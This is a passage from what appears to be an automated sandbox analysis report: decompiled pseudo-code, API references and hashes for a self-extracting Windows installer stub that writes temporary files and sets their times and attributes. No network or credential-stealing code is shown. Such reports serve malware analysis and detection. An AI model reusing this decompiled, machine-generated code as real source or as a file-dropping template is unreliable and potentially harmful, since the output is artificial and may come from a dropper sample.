						_t30 = E00074702( &_v268, 0x791e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0007476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00074980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E000747E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x793f4 =  *0x793f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x791e4;
						_t63 = 0x791e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x791e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x791e4;
						_t30 = E00074702( &_v268, 0x791e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00074C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00074B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00074B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00074cd0
0x00074cdb
0x00074ce0
0x00074ce2
0x00074cee
0x00074cf2
0x00074d0e
0x00074d0e
0x00074d11
0x00074e83
0x00074e88
0x00074e98
0x00074e98
0x00074d17
0x00074d17
0x00074d1a
0x00074d2f
0x00074d2f
0x00000000
0x00074d2f
0x00074d1c
0x00074d1c
0x00074d1f
0x00074dcb
0x00074dd0
0x00074dd2
0x00074ddd
0x00074ddd
0x00074de3
0x00074de8
0x00074ded
0x00074ded
0x00074def
0x00074df0
0x00074df0
0x00074df4
0x00074df4
0x00074df6
0x00074df9
0x00074dfc
0x00074dfc
0x00074dfe
0x00074dff
0x00074dff
0x00074e03
0x00074e08
0x00074e0a
0x00074e0f
0x00074d03
0x00074d03
0x00000000
0x00074d03
0x00074e18
0x00074e20
0x00074e25
0x00074e27
0x00000000
0x00000000
0x00074e33
0x00074e38
0x00074e3a
0x00000000
0x00000000
0x00074e40
0x00074e51
0x00074e56
0x00074e5b
0x00074e5e
0x00000000
0x00000000
0x00074e6a
0x00074e6f
0x00074e71
0x00000000
0x00000000
0x00074e77
0x00074e7d
0x00000000
0x00074e7d
0x00074d25
0x00074d25
0x00074d28
0x00074d36
0x00074d3b
0x00074d40
0x00074d40
0x00074d42
0x00074d43
0x00074d43
0x00074d47
0x00074d4a
0x00074d4a
0x00074d4c
0x00074d4f
0x00074d4f
0x00074d51
0x00074d52
0x00074d52
0x00074d56
0x00074d5b
0x00074d5d
0x00074d62
0x00000000
0x00000000
0x00074d67
0x00074d6f
0x00074d74
0x00074d76
0x00000000
0x00000000
0x00074d7c
0x00074d84
0x00074d89
0x00074d8b
0x00000000
0x00000000
0x00074d94
0x00074d99
0x00074d9e
0x00074da1
0x00074daa
0x00074daa
0x00074da3
0x00074da3
0x00074da3
0x00074db5
0x00074dbb
0x00074dbd
0x00000000
0x00074dc3
0x00074dc5
0x00000000
0x00074dc5
0x00074dbd
0x00074d2a
0x00074d2a
0x00074d2d
0x00000000
0x00000000
0x00000000
0x00074d2d
0x00074cf8
0x00074cfd
0x00074d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00074DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00074DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00074D36, 00074DE3

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-1193786559
Opcode ID: dc2ce7f834da00b92eb7adb68f79027b5d9570263dd2552381eebc4af44e6849
Instruction ID: 13abe2bcda49d0266f072e6847c7b0a5951d15c500748fbb34869fec3733f714
Opcode Fuzzy Hash: dc2ce7f834da00b92eb7adb68f79027b5d9570263dd2552381eebc4af44e6849
Instruction Fuzzy Hash: DB412336E041018BCB758F38D9446F973E5AB46300F04C668D8CE97292DB7DDE8AC758

Uniqueness

Uniqueness Score: -1.00%

Function 00074C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x78d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00074c40
0x00074c4a
0x00074c8d
0x00000000
0x00074c70
0x00074c70
0x00074c7e
0x00074c86
0x00000000
0x00000000
0x00000000
0x00074c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00074C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00074C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00074C7E

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 885dedad5196f5871863566d5f5f773f2259f1d9318b64101f944e47100c62ac
Instruction ID: 719be1f21f509b55a95a4455108b29423f98862bc3032ef965891678c7863e91
Opcode Fuzzy Hash: 885dedad5196f5871863566d5f5f773f2259f1d9318b64101f944e47100c62ac
Instruction Fuzzy Hash: 67F06D72E01208AAABA59FA4CC499BB77ECEB45340B44852AA829D1050EB38D954C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0007487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0007487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0007490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00074880
0x0007488c
0x00074894
0x000748a0
0x000748c9
0x000748ce
0x000748a2
0x000748a8
0x000748b7
0x000748bc
0x000748aa
0x000748ac
0x000748ac
0x000748a8
0x000748de
0x000748e7
0x0007490b
0x000748ee
0x000748f0
0x00000000
0x00074902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00074A23,?,00074F67,*MEMCAB,00008000,00000180), ref: 000748DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00074F67,*MEMCAB,00008000,00000180), ref: 00074902

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45bacc9bd5eecedb0927a9edee0bb29f17614840971afc0d204e24db11f23fa6
Instruction ID: ddaac0f8f51d2b01c0bbccf170711333cea4e898b724f362972c58c6593602eb
Opcode Fuzzy Hash: 45bacc9bd5eecedb0927a9edee0bb29f17614840971afc0d204e24db11f23fa6
Instruction Fuzzy Hash: 63018BA3F1153426F36440284C88FBB444CCBDA731F1B8331BEAEE71D2D6684C0081E4

Uniqueness

Uniqueness Score: -1.00%

Function 00074AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00074AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x7858c; // 0x260
				_t9 = E00073680(_t20);
				if( *0x791d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x79400; // 0x8f800
							_t15 = _t14 + _t25;
							 *0x79400 = _t15;
							if( *0x78184 != 0) {
								_t21 =  *0x78584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x793f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00074ad5
0x00074adb
0x00074ae7
0x00074aee
0x00074b05
0x00074b0d
0x00074b14
0x00074b1a
0x00074b1c
0x00074b21
0x00074b2a
0x00074b2f
0x00074b31
0x00074b39
0x00074b54
0x00074b54
0x00074b39
0x00074b2f
0x00074b0f
0x00074b0f
0x00074b0f
0x00074b5e
0x00074ae9
0x00074aed
0x00074aed

APIs

Part of subcall function 00073680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0007369F
Part of subcall function 00073680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736B2
Part of subcall function 00073680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000736DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00074B05

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: c2f4a138e10e3f173a9d238f4ec1b2fe309fe4df5d83b719c3257faf3aaf5edb
Instruction ID: 7aa4d531bd6c8bf2c7b16f08f5b66c9a96877e4f882e6627d2708eaf761d2000
Opcode Fuzzy Hash: c2f4a138e10e3f173a9d238f4ec1b2fe309fe4df5d83b719c3257faf3aaf5edb
Instruction Fuzzy Hash: 10018031E40205ABE7148F58DC09BA677A9E744725F04C225F93DA71E0CB7CDCA1CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0007658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x78b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x78b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E000716B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00076592
0x00076594
0x00076596
0x00076598
0x00076598
0x0007659b
0x0007659b
0x0007659d
0x0007659e
0x000765a2
0x000765a4
0x000765a9
0x000765b2
0x000765b6
0x000765ba
0x000765c3
0x000765c5
0x000765c8
0x000765c8
0x000765c3
0x000765c9
0x000765cc
0x000765d2
0x000765d1
0x000765d1
0x00000000
0x000765dc
0x00000000

APIs

CharPrevA.USER32(00078B3E,00078B3F,00000001,00078B3E,-00000003,?,000760EC,00071140,?), ref: 000765BA

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 26daea465df6d50caa76d541822274b6ee98d565319d9b6776a99ae323d4dce4
Instruction ID: 6bdc2aaece9f382640334d2971c77a7c61fbafa70906dde86a1a09718fd7ec9b
Opcode Fuzzy Hash: 26daea465df6d50caa76d541822274b6ee98d565319d9b6776a99ae323d4dce4
Instruction Fuzzy Hash: 4CF02D72A04E509BD332051D9884BAABFD99B86350F24816AE8DFC3245DA5F5C4592B8

Uniqueness

Uniqueness Score: -1.00%

Function 0007621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0007621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x78004; // 0xdaa0d862
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0007597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E000744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x79124 = E00076285();
					_t9 = 0;
				}
				return E00076CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00076229
0x00076230
0x00076247
0x0007626a
0x00076272
0x00076249
0x00076255
0x0007625f
0x00076264
0x00076264
0x00076284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0007623F

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: ee44fc1bea1e36b1c7ea47f30658cb6f92327095a17d1c13b1ba2f61bb036a46
Instruction ID: 4472abb9a8662cebf8e12b80ab557bffb4b28b9668f2399118bf137d5b31954e
Opcode Fuzzy Hash: ee44fc1bea1e36b1c7ea47f30658cb6f92327095a17d1c13b1ba2f61bb036a46
Instruction Fuzzy Hash: 7FF0B4B0F00608ABE790EB748D06BFE32A8DB44300F408469A98EE6083DD7D99858698

Uniqueness

Uniqueness Score: -1.00%

Function 00074B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x78d64)) != 1) {
					_t7 = _t15 + 0x78d74; // 0x5bffafb8, executed
					_t9 = FindCloseChangeNotification( *_t7); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x78d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x78d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x78d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x78d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x78d6c)) = 0;
				return 0;
			}

0x00074b66
0x00074b74
0x00074b92
0x00074b98
0x00074ba0
0x00000000
0x00074bac
0x00074ba4
0x00000000
0x00074ba4
0x00074b78
0x00074b7e
0x00074b84
0x00074b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(5BFFAFB8,00000000,00000000,?,00074FA1,00000000), ref: 00074B98

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a7124282b3d058f5804ff903f167ea6e84ff142cc4505303736bc381a5833b2f
Instruction ID: 5d969e74c608849cc10292d500589ad84973970382a28eba136aad473f0694d0
Opcode Fuzzy Hash: a7124282b3d058f5804ff903f167ea6e84ff142cc4505303736bc381a5833b2f
Instruction Fuzzy Hash: F3F01231F80B089E47718F39CC0A696BBE4ABD53A1710C92F946ED2190EB38AC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 000766AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000766AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x000766b1
0x000766ba
0x000766c7
0x000766bc
0x000766be
0x000766be

APIs

GetFileAttributesA.KERNELBASE(?,00074777,?,00074E38,?), ref: 000766B1

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3eb9a60065c57631e36603cfc6677c42497082345db8f99bbcf5fcadc092178d
Instruction ID: 8b3f8ea3b8d7c05fe251044c3297568f2dda8d923b843bd0556bdbe10cbd74db
Opcode Fuzzy Hash: 3eb9a60065c57631e36603cfc6677c42497082345db8f99bbcf5fcadc092178d
Instruction Fuzzy Hash: 81B092B6A22840426E6006316C2955A2881B7C233A7E85B90F03BD01E0CA3ED886D048

Uniqueness

Uniqueness Score: -1.00%

Function 00074CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00074caa
0x00074cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00074CAA

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 522770a83f18779201b5eb02782907131ea1052f95177ad6373b2d62540a61f1
Instruction ID: 4128babbcfca99aaef9b807e94c0681fa86be86e787eab50323ceb663543495c
Opcode Fuzzy Hash: 522770a83f18779201b5eb02782907131ea1052f95177ad6373b2d62540a61f1
Instruction Fuzzy Hash: 1BB0123214420CB7DF001FC2EC09F893F5DF7C5761F140000F60C450508A7A945086D6

Uniqueness

Uniqueness Score: -1.00%

Function 00074CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00074CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00074cc8
0x00074ccf

APIs

GlobalFree.KERNEL32 ref: 00074CC8

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: d089ac26431a1fa6815cfd3e7abb4dc49caec2c0fdca8011840e240b87da1fd4
Instruction ID: 7b59718697eb7b19d9615c41feeca36b5334107249be29aa0e08cbf812a41ba9
Opcode Fuzzy Hash: d089ac26431a1fa6815cfd3e7abb4dc49caec2c0fdca8011840e240b87da1fd4
Instruction Fuzzy Hash: 38B0123100010CBB8F001B42EC088493F1DD7C13607000010F50C410218B3F985185C5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00075C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00075C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x78004; // 0xdaa0d862
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00076CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00076E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x78004; // 0xdaa0d862
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0007597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
